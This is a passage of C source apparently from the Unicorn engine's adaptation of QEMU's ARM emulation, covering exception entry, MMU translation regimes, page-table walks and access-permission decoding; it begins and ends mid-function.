*/ if ((env->cp15.sctlr_el[new_el] & SCTLR_SPAN) == 0) { new_mode |= PSTATE_PAN; } break; } } pstate_write(env, PSTATE_DAIF | new_mode); env->aarch64 = 1; aarch64_restore_sp(env, new_el); helper_rebuild_hflags_a64(env, new_el); env->pc = addr; qemu_log_mask(CPU_LOG_INT, "...to EL%d PC 0x%" PRIx64 " PSTATE 0x%x\n", new_el, env->pc, pstate_read(env)); } /* Handle a CPU exception for A and R profile CPUs. * Do any appropriate logging, handle PSCI calls, and then hand off * to the AArch64-entry or AArch32-entry function depending on the * target exception level's register width. */ void arm_cpu_do_interrupt(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; unsigned int new_el = env->exception.target_el; assert(!arm_feature(env, ARM_FEATURE_M)); if (arm_is_psci_call(cpu, cs->exception_index)) { arm_handle_psci_call(cpu); return; } /* * Semihosting semantics depend on the register width of the code * that caused the exception, not the target exception level, so * must be handled here. */ if (cs->exception_index == EXCP_SEMIHOST) { // handle_semihosting(cs); return; } /* Hooks may change global state so BQL should be held, also the * BQL needs to be held for any modification of * cs->interrupt_request. */ arm_call_pre_el_change_hook(cpu); assert(!excp_is_internal(cs->exception_index)); if (arm_el_is_aa64(env, new_el)) { arm_cpu_do_interrupt_aarch64_qemu(cs); } else { arm_cpu_do_interrupt_aarch32_qemu(cs); } arm_call_el_change_hook(cpu); cs->interrupt_request |= CPU_INTERRUPT_EXITTB; } /* Return the exception level which controls this address translation regime */ static uint32_t regime_el(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_Stage2: case ARMMMUIdx_E2: return 2; case ARMMMUIdx_SE3: return 3; case ARMMMUIdx_SE10_0: return arm_el_is_aa64(env, 3) ? 1 : 3; case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_MPrivNegPri: case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MPriv: case ARMMMUIdx_MUser: case ARMMMUIdx_MSPrivNegPri: case ARMMMUIdx_MSUserNegPri: case ARMMMUIdx_MSPriv: case ARMMMUIdx_MSUser: return 1; default: g_assert_not_reached(); // never reach here return 1; } } uint64_t arm_sctlr(CPUARMState *env, int el) { /* Only EL0 needs to be adjusted for EL1&0 or EL2&0. */ if (el == 0) { ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, 0); el = (mmu_idx == ARMMMUIdx_E20_0 ? 2 : 1); } return env->cp15.sctlr_el[el]; } /* Return the SCTLR value which controls this address translation regime */ static inline uint64_t regime_sctlr(CPUARMState *env, ARMMMUIdx mmu_idx) { return env->cp15.sctlr_el[regime_el(env, mmu_idx)]; } /* Return true if the specified stage of address translation is disabled */ static inline bool regime_translation_disabled(CPUARMState *env, ARMMMUIdx mmu_idx) { if (arm_feature(env, ARM_FEATURE_M)) { switch (env->v7m.mpu_ctrl[regime_is_secure(env, mmu_idx)] & (R_V7M_MPU_CTRL_ENABLE_MASK | R_V7M_MPU_CTRL_HFNMIENA_MASK)) { case R_V7M_MPU_CTRL_ENABLE_MASK: /* Enabled, but not for HardFault and NMI */ return mmu_idx & ARM_MMU_IDX_M_NEGPRI; case R_V7M_MPU_CTRL_ENABLE_MASK | R_V7M_MPU_CTRL_HFNMIENA_MASK: /* Enabled for all cases */ return false; case 0: default: /* HFNMIENA set and ENABLE clear is UNPREDICTABLE, but * we warned about that in armv7m_nvic.c when the guest set it. 
*/ return true; } } if (mmu_idx == ARMMMUIdx_Stage2) { /* HCR.DC means HCR.VM behaves as 1 */ return (env->cp15.hcr_el2 & (HCR_DC | HCR_VM)) == 0; } if (env->cp15.hcr_el2 & HCR_TGE) { /* TGE means that NS EL0/1 act as if SCTLR_EL1.M is zero */ if (!regime_is_secure(env, mmu_idx) && regime_el(env, mmu_idx) == 1) { return true; } } if ((env->cp15.hcr_el2 & HCR_DC) && arm_mmu_idx_is_stage1_of_2(mmu_idx)) { /* HCR.DC means SCTLR_EL1.M behaves as 0 */ return true; } return (regime_sctlr(env, mmu_idx) & SCTLR_M) == 0; } static inline bool regime_translation_big_endian(CPUARMState *env, ARMMMUIdx mmu_idx) { return (regime_sctlr(env, mmu_idx) & SCTLR_EE) != 0; } /* Return the TTBR associated with this translation regime */ static inline uint64_t regime_ttbr(CPUARMState *env, ARMMMUIdx mmu_idx, int ttbrn) { if (mmu_idx == ARMMMUIdx_Stage2) { return env->cp15.vttbr_el2; } if (ttbrn == 0) { return env->cp15.ttbr0_el[regime_el(env, mmu_idx)]; } else { return env->cp15.ttbr1_el[regime_el(env, mmu_idx)]; } } /* Return the TCR controlling this translation regime */ static inline TCR *regime_tcr(CPUARMState *env, ARMMMUIdx mmu_idx) { if (mmu_idx == ARMMMUIdx_Stage2) { return &env->cp15.vtcr_el2; } return &env->cp15.tcr_el[regime_el(env, mmu_idx)]; } /* Convert a possible stage1+2 MMU index into the appropriate * stage 1 MMU index */ static inline ARMMMUIdx stage_1_mmu_idx(ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_E10_0: return ARMMMUIdx_Stage1_E0; case ARMMMUIdx_E10_1: return ARMMMUIdx_Stage1_E1; case ARMMMUIdx_E10_1_PAN: return ARMMMUIdx_Stage1_E1_PAN; default: return mmu_idx; } } /* Return true if the translation regime is using LPAE format page tables */ static inline bool regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx) { int el = regime_el(env, mmu_idx); if (el == 2 || arm_el_is_aa64(env, el)) { return true; } if (arm_feature(env, ARM_FEATURE_LPAE) && (regime_tcr(env, mmu_idx)->raw_tcr & TTBCR_EAE)) { return true; } return false; } /* Returns true if the stage 1 translation regime is using LPAE format page * tables. Used when raising alignment exceptions, whose FSR changes depending * on whether the long or short descriptor format is in use. */ bool arm_s1_regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx) { mmu_idx = stage_1_mmu_idx(mmu_idx); return regime_using_lpae_format(env, mmu_idx); } static inline bool regime_is_user(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_SE10_0: case ARMMMUIdx_E20_0: case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_MUser: case ARMMMUIdx_MSUser: case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MSUserNegPri: return true; default: return false; case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: g_assert_not_reached(); // never reach here return false; } } /* Translate section/page access permissions to page * R/W protection flags * * @env: CPUARMState * @mmu_idx: MMU index indicating required translation regime * @ap: The 3-bit access permissions (AP[2:0]) * @domain_prot: The 2-bit domain access permissions */ static inline int ap_to_rw_prot(CPUARMState *env, ARMMMUIdx mmu_idx, int ap, int domain_prot) { bool is_user = regime_is_user(env, mmu_idx); if (domain_prot == 3) { return PAGE_READ | PAGE_WRITE; } switch (ap) { case 0: if (arm_feature(env, ARM_FEATURE_V7)) { return 0; } switch (regime_sctlr(env, mmu_idx) & (SCTLR_S | SCTLR_R)) { case SCTLR_S: return is_user ? 0 : PAGE_READ; case SCTLR_R: return PAGE_READ; default: return 0; } case 1: return is_user ? 
0 : PAGE_READ | PAGE_WRITE; case 2: if (is_user) { return PAGE_READ; } else { return PAGE_READ | PAGE_WRITE; } case 3: return PAGE_READ | PAGE_WRITE; case 4: /* Reserved. */ return 0; case 5: return is_user ? 0 : PAGE_READ; case 6: return PAGE_READ; case 7: if (!arm_feature(env, ARM_FEATURE_V6K)) { return 0; } return PAGE_READ; default: g_assert_not_reached(); // never reach here return PAGE_READ; } } /* Translate section/page access permissions to page * R/W protection flags. * * @ap: The 2-bit simple AP (AP[2:1]) * @is_user: TRUE if accessing from PL0 */ static inline int simple_ap_to_rw_prot_is_user(int ap, bool is_user) { switch (ap) { case 0: return is_user ? 0 : PAGE_READ | PAGE_WRITE; case 1: return PAGE_READ | PAGE_WRITE; case 2: return is_user ? 0 : PAGE_READ; case 3: return PAGE_READ; default: g_assert_not_reached(); // never reach here return PAGE_READ; } } static inline int simple_ap_to_rw_prot(CPUARMState *env, ARMMMUIdx mmu_idx, int ap) { return simple_ap_to_rw_prot_is_user(ap, regime_is_user(env, mmu_idx)); } /* Translate S2 section/page access permissions to protection flags * * @env: CPUARMState * @s2ap: The 2-bit stage2 access permissions (S2AP) * @xn: XN (execute-never) bit */ static int get_S2prot(CPUARMState *env, int s2ap, int xn) { int prot = 0; if (s2ap & 1) { prot |= PAGE_READ; } if (s2ap & 2) { prot |= PAGE_WRITE; } if (!xn) { if (arm_el_is_aa64(env, 2) || prot & PAGE_READ) { prot |= PAGE_EXEC; } } return prot; } /* Translate section/page access permissions to protection flags * * @env: CPUARMState * @mmu_idx: MMU index indicating required translation regime * @is_aa64: TRUE if AArch64 * @ap: The 2-bit simple AP (AP[2:1]) * @ns: NS (non-secure) bit * @xn: XN (execute-never) bit * @pxn: PXN (privileged execute-never) bit */ static int get_S1prot(CPUARMState *env, ARMMMUIdx mmu_idx, bool is_aa64, int ap, int ns, int xn, int pxn) { bool is_user = regime_is_user(env, mmu_idx); int prot_rw, user_rw; bool have_wxn; int wxn = 0; assert(mmu_idx != ARMMMUIdx_Stage2); user_rw = simple_ap_to_rw_prot_is_user(ap, true); if (is_user) { prot_rw = user_rw; } else { if (user_rw && regime_is_pan(env, mmu_idx)) { /* PAN forbids data accesses but doesn't affect insn fetch */ prot_rw = 0; } else { prot_rw = simple_ap_to_rw_prot_is_user(ap, false); } } if (ns && arm_is_secure(env) && (env->cp15.scr_el3 & SCR_SIF)) { return prot_rw; } /* TODO have_wxn should be replaced with * ARM_FEATURE_V8 || (ARM_FEATURE_V7 && ARM_FEATURE_EL2) * when ARM_FEATURE_EL2 starts getting set. For now we assume all LPAE * compatible processors have EL2, which is required for [U]WXN. 
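     *
     * E.g. with SCTLR.WXN set, a mapping whose prot_rw includes
     * PAGE_WRITE never gains PAGE_EXEC below, whatever its XN bit says.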
*/ have_wxn = arm_feature(env, ARM_FEATURE_LPAE); if (have_wxn) { wxn = regime_sctlr(env, mmu_idx) & SCTLR_WXN; } if (is_aa64) { if (regime_has_2_ranges(mmu_idx) && !is_user) { xn = pxn || (user_rw & PAGE_WRITE); } } else if (arm_feature(env, ARM_FEATURE_V7)) { switch (regime_el(env, mmu_idx)) { case 1: case 3: if (is_user) { xn = xn || !(user_rw & PAGE_READ); } else { int uwxn = 0; if (have_wxn) { uwxn = regime_sctlr(env, mmu_idx) & SCTLR_UWXN; } xn = xn || !(prot_rw & PAGE_READ) || pxn || (uwxn && (user_rw & PAGE_WRITE)); } break; case 2: break; } } else { xn = wxn = 0; } if (xn || (wxn && (prot_rw & PAGE_WRITE))) { return prot_rw; } return prot_rw | PAGE_EXEC; } static bool get_level1_table_address(CPUARMState *env, ARMMMUIdx mmu_idx, uint32_t *table, uint32_t address) { /* Note that we can only get here for an AArch32 PL0/PL1 lookup */ TCR *tcr = regime_tcr(env, mmu_idx); if (address & tcr->mask) { if (tcr->raw_tcr & TTBCR_PD1) { /* Translation table walk disabled for TTBR1 */ return false; } *table = regime_ttbr(env, mmu_idx, 1) & 0xffffc000; } else { if (tcr->raw_tcr & TTBCR_PD0) { /* Translation table walk disabled for TTBR0 */ return false; } *table = regime_ttbr(env, mmu_idx, 0) & tcr->base_mask; } *table |= (address >> 18) & 0x3ffc; return true; } /* Translate a S1 pagetable walk through S2 if needed. */ static hwaddr S1_ptw_translate(CPUARMState *env, ARMMMUIdx mmu_idx, hwaddr addr, MemTxAttrs txattrs, ARMMMUFaultInfo *fi) { if (arm_mmu_idx_is_stage1_of_2(mmu_idx) && !regime_translation_disabled(env, ARMMMUIdx_Stage2)) { target_ulong s2size; hwaddr s2pa; int s2prot; int ret; ARMCacheAttrs cacheattrs = { 0 }; ARMCacheAttrs *pcacheattrs = NULL; if (env->cp15.hcr_el2 & HCR_PTW) { /* * PTW means we must fault if this S1 walk touches S2 Device * memory; otherwise we don't care about the attributes and can * save the S2 translation the effort of computing them. */ pcacheattrs = &cacheattrs; } ret = get_phys_addr_lpae(env, addr, 0, ARMMMUIdx_Stage2, &s2pa, &txattrs, &s2prot, &s2size, fi, pcacheattrs); if (ret) { assert(fi->type != ARMFault_None); fi->s2addr = addr; fi->stage2 = true; fi->s1ptw = true; return ~0; } if (pcacheattrs && (pcacheattrs->attrs & 0xf0) == 0) { /* Access was to Device memory: generate Permission fault */ fi->type = ARMFault_Permission; fi->s2addr = addr; fi->stage2 = true; fi->s1ptw = true; return ~0; } addr = s2pa; } return addr; } /* All loads done in the course of a page table walk go through here. 
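 *
 * Each descriptor fetch is (1) optionally translated through stage 2 by
 * S1_ptw_translate(), (2) issued with the endianness selected by the
 * regime's SCTLR.EE bit, and (3) reported as ARMFault_SyncExternalOnWalk
 * if the bus access fails.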
*/ static uint32_t arm_ldl_ptw(CPUState *cs, hwaddr addr, bool is_secure, ARMMMUIdx mmu_idx, ARMMMUFaultInfo *fi) { struct uc_struct *uc = cs->uc; ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult result = MEMTX_OK; AddressSpace *as; uint32_t data; attrs.secure = is_secure; as = arm_addressspace(cs, attrs); addr = S1_ptw_translate(env, mmu_idx, addr, attrs, fi); if (fi->s1ptw) { return 0; } if (regime_translation_big_endian(env, mmu_idx)) { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldl_be, UNICORN_ARCH_POSTFIX)(uc, as, addr, attrs, &result); #else data = address_space_ldl_be(uc, as, addr, attrs, &result); #endif } else { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldl_le, UNICORN_ARCH_POSTFIX)(uc, as, addr, attrs, &result); #else data = address_space_ldl_le(uc, as, addr, attrs, &result); #endif } if (result == MEMTX_OK) { return data; } fi->type = ARMFault_SyncExternalOnWalk; fi->ea = arm_extabort_type(result); return 0; } static uint64_t arm_ldq_ptw(CPUState *cs, hwaddr addr, bool is_secure, ARMMMUIdx mmu_idx, ARMMMUFaultInfo *fi) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult result = MEMTX_OK; AddressSpace *as; uint64_t data; attrs.secure = is_secure; as = arm_addressspace(cs, attrs); addr = S1_ptw_translate(env, mmu_idx, addr, attrs, fi); if (fi->s1ptw) { return 0; } if (regime_translation_big_endian(env, mmu_idx)) { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldq_be, UNICORN_ARCH_POSTFIX)(cs->uc, as, addr, attrs, &result); #else data = address_space_ldq_be(cs->uc, as, addr, attrs, &result); #endif } else { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldq_le, UNICORN_ARCH_POSTFIX)(cs->uc, as, addr, attrs, &result); #else data = address_space_ldq_le(cs->uc, as, addr, attrs, &result); #endif } if (result == MEMTX_OK) { return data; } fi->type = ARMFault_SyncExternalOnWalk; fi->ea = arm_extabort_type(result); return 0; } static bool get_phys_addr_v5(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { CPUState *cs = env_cpu(env); int level = 1; uint32_t table; uint32_t desc; int type; int ap; int domain = 0; int domain_prot; hwaddr phys_addr; uint32_t dacr; /* Pagetable walk. */ /* Lookup l1 descriptor. */ if (!get_level1_table_address(env, mmu_idx, &table, address)) { /* Section translation fault if page walk is disabled by PD0 or PD1 */ fi->type = ARMFault_Translation; goto do_fault; } desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } type = (desc & 3); domain = (desc >> 5) & 0x0f; if (regime_el(env, mmu_idx) == 1) { dacr = env->cp15.dacr_ns; } else { dacr = env->cp15.dacr_s; } domain_prot = (dacr >> (domain * 2)) & 3; if (type == 0) { /* Section translation fault. */ fi->type = ARMFault_Translation; goto do_fault; } if (type != 2) { level = 2; } if (domain_prot == 0 || domain_prot == 2) { fi->type = ARMFault_Domain; goto do_fault; } if (type == 2) { /* 1Mb section. */ phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); ap = (desc >> 10) & 3; *page_size = 1024 * 1024; } else { /* Lookup l2 entry. */ if (type == 1) { /* Coarse pagetable. */ table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); } else { /* Fine pagetable. 
*/ table = (desc & 0xfffff000) | ((address >> 8) & 0xffc); } desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } switch (desc & 3) { case 0: /* Page translation fault. */ fi->type = ARMFault_Translation; goto do_fault; case 1: /* 64k page. */ phys_addr = (desc & 0xffff0000) | (address & 0xffff); ap = (desc >> (4 + ((address >> 13) & 6))) & 3; *page_size = 0x10000; break; case 2: /* 4k page. */ phys_addr = (desc & 0xfffff000) | (address & 0xfff); ap = (desc >> (4 + ((address >> 9) & 6))) & 3; *page_size = 0x1000; break; case 3: /* 1k page, or ARMv6/XScale "extended small (4k) page" */ if (type == 1) { /* ARMv6/XScale extended small page format */ if (arm_feature(env, ARM_FEATURE_XSCALE) || arm_feature(env, ARM_FEATURE_V6)) { phys_addr = (desc & 0xfffff000) | (address & 0xfff); *page_size = 0x1000; } else { /* UNPREDICTABLE in ARMv5; we choose to take a * page translation fault. */ fi->type = ARMFault_Translation; goto do_fault; } } else { phys_addr = (desc & 0xfffffc00) | (address & 0x3ff); *page_size = 0x400; } ap = (desc >> 4) & 3; break; default: /* Never happens, but compiler isn't smart enough to tell. */ abort(); } } *prot = ap_to_rw_prot(env, mmu_idx, ap, domain_prot); *prot |= *prot ? PAGE_EXEC : 0; if (!(*prot & (1 << access_type))) { /* Access permission fault. */ fi->type = ARMFault_Permission; goto do_fault; } *phys_ptr = phys_addr; return false; do_fault: fi->domain = domain; fi->level = level; return true; } static bool get_phys_addr_v6(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *attrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { CPUState *cs = env_cpu(env); int level = 1; uint32_t table; uint32_t desc; uint32_t xn; uint32_t pxn = 0; int type; int ap; int domain = 0; int domain_prot; hwaddr phys_addr; uint32_t dacr; bool ns; /* Pagetable walk. */ /* Lookup l1 descriptor. */ if (!get_level1_table_address(env, mmu_idx, &table, address)) { /* Section translation fault if page walk is disabled by PD0 or PD1 */ fi->type = ARMFault_Translation; goto do_fault; } desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } type = (desc & 3); if (type == 0 || (type == 3 && !arm_feature(env, ARM_FEATURE_PXN))) { /* Section translation fault, or attempt to use the encoding * which is Reserved on implementations without PXN. */ fi->type = ARMFault_Translation; goto do_fault; } if ((type == 1) || !(desc & (1 << 18))) { /* Page or Section. */ domain = (desc >> 5) & 0x0f; } if (regime_el(env, mmu_idx) == 1) { dacr = env->cp15.dacr_ns; } else { dacr = env->cp15.dacr_s; } if (type == 1) { level = 2; } domain_prot = (dacr >> (domain * 2)) & 3; if (domain_prot == 0 || domain_prot == 2) { /* Section or Page domain fault */ fi->type = ARMFault_Domain; goto do_fault; } if (type != 1) { if (desc & (1 << 18)) { /* Supersection. */ phys_addr = (desc & 0xff000000) | (address & 0x00ffffff); phys_addr |= (uint64_t)extract32(desc, 20, 4) << 32; phys_addr |= (uint64_t)extract32(desc, 5, 4) << 36; *page_size = 0x1000000; } else { /* Section. */ phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); *page_size = 0x100000; } ap = ((desc >> 10) & 3) | ((desc >> 13) & 4); xn = desc & (1 << 4); pxn = desc & 1; ns = extract32(desc, 19, 1); } else { if (arm_feature(env, ARM_FEATURE_PXN)) { pxn = (desc >> 2) & 1; } ns = extract32(desc, 3, 1); /* Lookup l2 entry. 
*/ table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } ap = ((desc >> 4) & 3) | ((desc >> 7) & 4); switch (desc & 3) { case 0: /* Page translation fault. */ fi->type = ARMFault_Translation; goto do_fault; case 1: /* 64k page. */ phys_addr = (desc & 0xffff0000) | (address & 0xffff); xn = desc & (1 << 15); *page_size = 0x10000; break; case 2: case 3: /* 4k page. */ phys_addr = (desc & 0xfffff000) | (address & 0xfff); xn = desc & 1; *page_size = 0x1000; break; default: /* Never happens, but compiler isn't smart enough to tell. */ abort(); } } if (domain_prot == 3) { *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; } else { if (pxn && !regime_is_user(env, mmu_idx)) { xn = 1; } if (xn && access_type == MMU_INST_FETCH) { fi->type = ARMFault_Permission; goto do_fault; } if (arm_feature(env, ARM_FEATURE_V6K) && (regime_sctlr(env, mmu_idx) & SCTLR_AFE)) { /* The simplified model uses AP[0] as an access control bit. */ if ((ap & 1) == 0) { /* Access flag fault. */ fi->type = ARMFault_AccessFlag; goto do_fault; } *prot = simple_ap_to_rw_prot(env, mmu_idx, ap >> 1); } else { *prot = ap_to_rw_prot(env, mmu_idx, ap, domain_prot); } if (*prot && !xn) { *prot |= PAGE_EXEC; } if (!(*prot & (1 << access_type))) { /* Access permission fault. */ fi->type = ARMFault_Permission; goto do_fault; } } if (ns) { /* The NS bit will (as required by the architecture) have no effect if * the CPU doesn't support TZ or this is a non-secure translation * regime, because the attribute will already be non-secure. */ attrs->secure = false; } *phys_ptr = phys_addr; return false; do_fault: fi->domain = domain; fi->level = level; return true; } /* * check_s2_mmu_setup * @cpu: ARMCPU * @is_aa64: True if the translation regime is in AArch64 state * @startlevel: Suggested starting level * @inputsize: Bitsize of IPAs * @stride: Page-table stride (See the ARM ARM) * * Returns true if the suggested S2 translation parameters are OK and * false otherwise. */ static bool check_s2_mmu_setup(ARMCPU *cpu, bool is_aa64, int level, int inputsize, int stride) { const int grainsize = stride + 3; int startsizecheck; /* Negative levels are never allowed. */ if (level < 0) { return false; } startsizecheck = inputsize - ((3 - level) * stride + grainsize); if (startsizecheck < 1 || startsizecheck > stride + 4) { return false; } if (is_aa64) { CPUARMState *env = &cpu->env; unsigned int pamax = arm_pamax(cpu); switch (stride) { case 13: /* 64KB Pages. */ if (level == 0 || (level == 1 && pamax <= 42)) { return false; } break; case 11: /* 16KB Pages. */ if (level == 0 || (level == 1 && pamax <= 40)) { return false; } break; case 9: /* 4KB Pages. */ if (level == 0 && pamax <= 42) { return false; } break; default: g_assert_not_reached(); break; } /* Inputsize checks. */ if (inputsize > pamax && (arm_el_is_aa64(env, 1) || inputsize > 40)) { /* This is CONSTRAINED UNPREDICTABLE and we choose to fault. */ return false; } } else { /* AArch32 only supports 4KB pages. Assert on that. */ assert(stride == 9); if (level == 0) { return false; } } return true; } /* Translate from the 4-bit stage 2 representation of * memory attributes (without cache-allocation hints) to * the 8-bit representation of the stage 1 MAIR registers * (which includes allocation hints). 
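* Worked example (assuming HCR_EL2.CD is clear): a stage 2 attribute of 0xf (outer and inner write-back) converts to 0xff, i.e. write-back with read/write-allocate hints in both nibbles.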
* * ref: shared/translation/attrs/S2AttrDecode() * .../S2ConvertAttrsHints() */ static uint8_t convert_stage2_attrs(CPUARMState *env, uint8_t s2attrs) { uint8_t hiattr = extract32(s2attrs, 2, 2); uint8_t loattr = extract32(s2attrs, 0, 2); uint8_t hihint = 0, lohint = 0; if (hiattr != 0) { /* normal memory */ if ((env->cp15.hcr_el2 & HCR_CD) != 0) { /* cache disabled */ hiattr = loattr = 1; /* non-cacheable */ } else { if (hiattr != 1) { /* Write-through or write-back */ hihint = 3; /* RW allocate */ } if (loattr != 1) { /* Write-through or write-back */ lohint = 3; /* RW allocate */ } } } return (hiattr << 6) | (hihint << 4) | (loattr << 2) | lohint; } static int aa64_va_parameter_tbi(uint64_t tcr, ARMMMUIdx mmu_idx) { if (regime_has_2_ranges(mmu_idx)) { return extract64(tcr, 37, 2); } else if (mmu_idx == ARMMMUIdx_Stage2) { return 0; /* VTCR_EL2 */ } else { /* Replicate the single TBI bit so we always have 2 bits. */ return extract32(tcr, 20, 1) * 3; } } static int aa64_va_parameter_tbid(uint64_t tcr, ARMMMUIdx mmu_idx) { if (regime_has_2_ranges(mmu_idx)) { return extract64(tcr, 51, 2); } else if (mmu_idx == ARMMMUIdx_Stage2) { return 0; /* VTCR_EL2 */ } else { /* Replicate the single TBID bit so we always have 2 bits. */ return extract32(tcr, 29, 1) * 3; } } ARMVAParameters aa64_va_parameters(CPUARMState *env, uint64_t va, ARMMMUIdx mmu_idx, bool data) { uint64_t tcr = regime_tcr(env, mmu_idx)->raw_tcr; bool epd, hpd, using16k, using64k; int select, tsz, tbi; if (!regime_has_2_ranges(mmu_idx)) { select = 0; tsz = extract32(tcr, 0, 6); using64k = extract32(tcr, 14, 1); using16k = extract32(tcr, 15, 1); if (mmu_idx == ARMMMUIdx_Stage2) { /* VTCR_EL2 */ hpd = false; } else { hpd = extract32(tcr, 24, 1); } epd = false; } else { /* * Bit 55 is always between the two regions, and is canonical for * determining if address tagging is enabled. */ select = extract64(va, 55, 1); if (!select) { tsz = extract32(tcr, 0, 6); epd = extract32(tcr, 7, 1); using64k = extract32(tcr, 14, 1); using16k = extract32(tcr, 15, 1); hpd = extract64(tcr, 41, 1); } else { int tg = extract32(tcr, 30, 2); using16k = tg == 1; using64k = tg == 3; tsz = extract32(tcr, 16, 6); epd = extract32(tcr, 23, 1); hpd = extract64(tcr, 42, 1); } } tsz = MIN(tsz, 39); /* TODO: ARMv8.4-TTST */ tsz = MAX(tsz, 16); /* TODO: ARMv8.2-LVA */ /* Present TBI as a composite with TBID. */ tbi = aa64_va_parameter_tbi(tcr, mmu_idx); if (!data) { tbi &= ~aa64_va_parameter_tbid(tcr, mmu_idx); } tbi = (tbi >> select) & 1; return (ARMVAParameters) { .tsz = tsz, .select = select, .tbi = tbi, .epd = epd, .hpd = hpd, .using16k = using16k, .using64k = using64k, }; } static ARMVAParameters aa32_va_parameters(CPUARMState *env, uint32_t va, ARMMMUIdx mmu_idx) { uint64_t tcr = regime_tcr(env, mmu_idx)->raw_tcr; uint32_t el = regime_el(env, mmu_idx); int select, tsz; bool epd, hpd; if (mmu_idx == ARMMMUIdx_Stage2) { /* VTCR */ bool sext = extract32(tcr, 4, 1); bool sign = extract32(tcr, 3, 1); /* * If the sign-extend bit is not the same as t0sz[3], the result * is unpredictable. Flag this as a guest error. 
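* Worked example: T0SZ == 0b1000 sign-extends to -8, so tsz below becomes 0; pairing that encoding with S == 0 is exactly the mismatch logged below.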
*/ if (sign != sext) { qemu_log_mask(LOG_GUEST_ERROR, "AArch32: VTCR.S / VTCR.T0SZ[3] mismatch\n"); } tsz = sextract32(tcr, 0, 4) + 8; select = 0; hpd = false; epd = false; } else if (el == 2) { /* HTCR */ tsz = extract32(tcr, 0, 3); select = 0; hpd = extract64(tcr, 24, 1); epd = false; } else { int t0sz = extract32(tcr, 0, 3); int t1sz = extract32(tcr, 16, 3); if (t1sz == 0) { select = va > (0xffffffffu >> t0sz); } else { /* Note that we will detect errors later. */ select = va >= ~(0xffffffffu >> t1sz); } if (!select) { tsz = t0sz; epd = extract32(tcr, 7, 1); hpd = extract64(tcr, 41, 1); } else { tsz = t1sz; epd = extract32(tcr, 23, 1); hpd = extract64(tcr, 42, 1); } /* For aarch32, hpd0 is not enabled without t2e as well. */ hpd &= extract32(tcr, 6, 1); } return (ARMVAParameters) { .tsz = tsz, .select = select, .epd = epd, .hpd = hpd, }; } static bool get_phys_addr_lpae(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, target_ulong *page_size_ptr, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); /* Read an LPAE long-descriptor translation table. */ ARMFaultType fault_type = ARMFault_Translation; uint32_t level; ARMVAParameters param; uint64_t ttbr; hwaddr descaddr, indexmask, indexmask_grainsize; uint32_t tableattrs; target_ulong page_size; uint32_t attrs; int32_t stride; int addrsize, inputsize; TCR *tcr = regime_tcr(env, mmu_idx); int ap, ns, xn, pxn; uint32_t el = regime_el(env, mmu_idx); uint64_t descaddrmask; bool aarch64 = arm_el_is_aa64(env, el); bool guarded = false; /* TODO: This code does not support shareability levels. */ if (aarch64) { param = aa64_va_parameters(env, address, mmu_idx, access_type != MMU_INST_FETCH); level = 0; addrsize = 64 - 8 * param.tbi; inputsize = 64 - param.tsz; } else { param = aa32_va_parameters(env, address, mmu_idx); level = 1; addrsize = (mmu_idx == ARMMMUIdx_Stage2 ? 40 : 32); inputsize = addrsize - param.tsz; } /* * We determined the region when collecting the parameters, but we * have not yet validated that the address is valid for the region. * Extract the top bits and verify that they all match select. * * For aa32, if inputsize == addrsize, then we have selected the * region by exclusion in aa32_va_parameters and there is no more * validation to do here. */ if (inputsize < addrsize) { target_ulong top_bits = sextract64(address, inputsize, addrsize - inputsize); #ifdef _MSC_VER if (param.select != (0 - top_bits)) { #else if (-top_bits != param.select) { #endif /* The gap between the two regions is a Translation fault */ fault_type = 